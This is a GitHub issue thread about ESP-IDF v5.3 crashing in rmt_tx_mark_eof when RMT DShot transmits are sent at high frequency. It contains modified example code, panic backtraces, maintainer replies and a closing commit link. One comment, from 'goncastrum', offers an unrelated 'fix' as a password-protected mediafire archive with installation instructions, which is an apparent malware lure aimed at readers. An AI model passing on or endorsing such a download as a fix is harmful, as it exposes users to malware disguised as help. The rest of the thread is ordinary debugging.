espressif/esp-idf #14480: RMT DShot Crashes With High Frequency Calls to rmt_transmit

Juan-Elizondo, 2024-09-02:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

v5.3

### Espressif SoC revision.

ESP32 revision v3.0

### Operating System used.

Windows

### How did you build your project?

Command line with idf.py

### If you are using Windows, please specify command line type.

PowerShell

### Development Kit.

Custom Board

### Power Supply used.

External 3.3V

### What is the expected behavior?

I have a working implementation for bidirectional dshot using the rmt peripheral on ESP-IDF v5.0. This implementation takes the official rmt dshot_esc as its starting point.
The implementation of the bidirectional protocol requires setting the `loop_count` member of `rmt_transmit_config_t` to 0. Otherwise we would be interrupting the processor at too fast a rate when we setup a receive ISR.
To keep the ESC from timing out, we then need to use the `rmt_transmit` function at a fairly high rate.

### What is the actual behavior?

When updating my ESP-IDF version to v5.3, I started getting runtime crashes on the code that worked on v5.0.
I went back to the basic dshot_esc example to reproduce the crashing and verified I can produce the same backtrace with a few modifications to the example.

### Steps to reproduce.

I only modified the file dshot_esc_example_main.c from the example.

- I set my own pin, as I have a custom board. I set the `loop_count` member of `rmt_transmit_config_t` variable tx_config to 0 once the arming sequence is complete
- I reduced the arming delay for 2seconds instead of 5, since my esc's are ok with that and it makes reproducing the crash faster.
- I changed the code to keep the throttle at 100, instead of incrementing it to keep the system stable. This step is not necessary to reproduce the crash
- I changed the delay within the main loop to 100ms instead of 1000ms. This is enough to cause the program to crash about 1 in 5 resets. In other code I would be running this closer to 1ms loops (using timers instead of RTOS functions), which makes the crashing more consistent.

The modified dshot_esc_example_main.c file:

/*
 * SPDX-FileCopyrightText: 2021-2022 Espressif Systems (Shanghai) CO LTD
 *
 * SPDX-License-Identifier: Unlicense OR CC0-1.0
 */

#include "freertos/FreeRTOS.h"
#include "freertos/task.h"
#include "esp_log.h"
#include "driver/rmt_tx.h"
#include "dshot_esc_encoder.h"

#if CONFIG_IDF_TARGET_ESP32H2
#define DSHOT_ESC_RESOLUTION_HZ 32000000 // 32MHz resolution, DSHot protocol needs a relative high resolution
[... 118 lines cut ...]
PC      : 0x40084569  PS      : 0x00060e30  A0      : 0x80084648  A1      : 0x3ffb40d0
0x40084569: rmt_tx_mark_eof at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:621

A2      : 0x3ffb4ed4  A3      : 0x3ffb4ed4  A4      : 0x3ffb41e8  A5      : 0x3ffb5254
A6      : 0x3ffb517c  A7      : 0x00000000  A8      : 0x00000000  A9      : 0x3ff56844
A10     : 0x3ff56800  A11     : 0x00000012  A12     : 0x3ffb5224  A13     : 0x00000011
A14     : 0x3ffb40c0  A15     : 0x00000030  SAR     : 0x00000020  EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000018  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff
0x4000c2e0: memcpy in ROM
0x4000c2f6: memcpy in ROM

Backtrace: 0x40084566:0x3ffb40d0 0x40084645:0x3ffb40f0 0x40084811:0x3ffb4120 0x400d97dd:0x3ffb4140 0x400d9237:0x3ffb4180 0x400d63d8:0x3ffb41b0 0x400e5a28:0x3ffb4210 0x400869dd:0x3ffb4240
0x40084566: rmt_tx_mark_eof at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:619
0x40084645: rmt_encode_check_result at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:657
0x40084811: rmt_tx_do_transaction at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:736
0x400d97dd: rmt_tx_enable at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:791
0x400d9237: rmt_enable at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_common.c:213
0x400d63d8: app_main at D:/ESP/DShot/main/dshot_esc_example_main.c:71
0x400e5a28: main_task at C:/Espressif/frameworks/esp-idf-v5.3/components/freertos/app_startup.c:208
0x400869dd: vPortTaskWrapper at C:/Espressif/frameworks/esp-idf-v5.3/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:134

ELF file SHA256: e426dba46

Rebooting...
```

goncastrum, 2024-09-02:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

suda-morris, 2024-09-02:
@Juan-Elizondo Thanks for your interest in that example.

I see you set the `loop_count` to zero, which means, it will only transmit the packet for once, and then goes into idle state. So you don't need to call `rmt_disable` and `rmt_enable`. Please have a try.

Juan-Elizondo, 2024-09-02:
Thank you for the reply. It did not work unfortunately. I called `rmt disable` and `rmt_enable` once after the arming sequence and removed from the loop.

Changed code:

ESP_LOGI(TAG, "Start ESC by sending zero throttle for a while...");
ESP_ERROR_CHECK(rmt_transmit(esc_chan, dshot_encoder, &throttle, sizeof(throttle), &tx_config));
//vTaskDelay(pdMS_TO_TICKS(5000));
vTaskDelay(pdMS_TO_TICKS(2000));
ESP_ERROR_CHECK(rmt_disable(esc_chan));
ESP_ERROR_CHECK(rmt_enable(esc_chan));
tx_config.loop_count = 0;
throttle.throttle = 100;

ESP_LOGI(TAG, "Increase throttle, no telemetry");
//for (uint16_t thro = 100; thro < 1000; thro += 10) {
//    throttle.throttle = thro;
while (true) {
  ESP_ERROR_CHECK(rmt_transmit(esc_chan, dshot_encoder, &throttle, sizeof(throttle), &tx_config));
  // the previous loop transfer is till undergoing, we need to stop it and restart,
  // so that the new throttle can be updated on the output
  // ESP_ERROR_CHECK(rmt_disable(esc_chan));
  // ESP_ERROR_CHECK(rmt_enable(esc_chan));
  //vTaskDelay(pdMS_TO_TICKS(1000));
  vTaskDelay(pdMS_TO_TICKS(100));
}

Log:

Guru Meditation Error: Core  0 panic'ed (LoadProhibited). Exception was unhandled.

Core  0 register dump:
PC      : 0x40084569  PS      : 0x00060c30  A0      : 0x80084648  A1      : 0x3ffb4100
0x40084569: rmt_tx_mark_eof at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:621

A2      : 0x3ffb4ed4  A3      : 0x3ffb4ed4  A4      : 0x3ffb41e8  A5      : 0x3ffb5254
A6      : 0x3ffb517c  A7      : 0x00000000  A8      : 0x00000000  A9      : 0x3ff56844
A10     : 0x3ff56800  A11     : 0x00000012  A12     : 0x3ffb5224  A13     : 0x00000011
A14     : 0x3ffb40f0  A15     : 0x00000030  SAR     : 0x00000020  EXCCAUSE: 0x0000001c
EXCVADDR: 0x00000018  LBEG    : 0x4000c2e0  LEND    : 0x4000c2f6  LCOUNT  : 0xffffffff
0x4000c2e0: memcpy in ROM
0x4000c2f6: memcpy in ROM

Backtrace: 0x40084566:0x3ffb4100 0x40084645:0x3ffb4120 0x40084811:0x3ffb4150 0x400da1fd:0x3ffb4170 0x400d63d9:0x3ffb41b0 0x400e5a2c:0x3ffb4210 0x400869dd:0x3ffb4240
0x40084566: rmt_tx_mark_eof at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:619
0x40084645: rmt_encode_check_result at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:657
0x40084811: rmt_tx_do_transaction at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:736
0x400da1fd: rmt_transmit at C:/Espressif/frameworks/esp-idf-v5.3/components/esp_driver_rmt/src/rmt_tx.c:577
0x400d63d9: app_main at D:/ESP/DShot/main/dshot_esc_example_main.c:69
0x400e5a2c: main_task at C:/Espressif/frameworks/esp-idf-v5.3/components/freertos/app_startup.c:208
0x400869dd: vPortTaskWrapper at C:/Espressif/frameworks/esp-idf-v5.3/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:134

ELF file SHA256: eb91d70e5

Rebooting...

elvis-epx, 2024-11-25:
Have a similar problem while porting MicroPython to the current RMT API. If rmt_disable() is called while a transmission is ongoing, it often (but no always) panics with wdt interrupt. This is unexpected since rmt_disable() is recommended by the documentation as a way to interrupt an infinite loop transmission.

This happens only on vanilla ESP32, not in ESP32-C3.

suda-morris, 2026-03-03:
fixed by https://github.com/espressif/esp-idf/commit/154280d32ef891a6fdff995fd84cc47da5664513

closed 2026-03-03 by suda-morris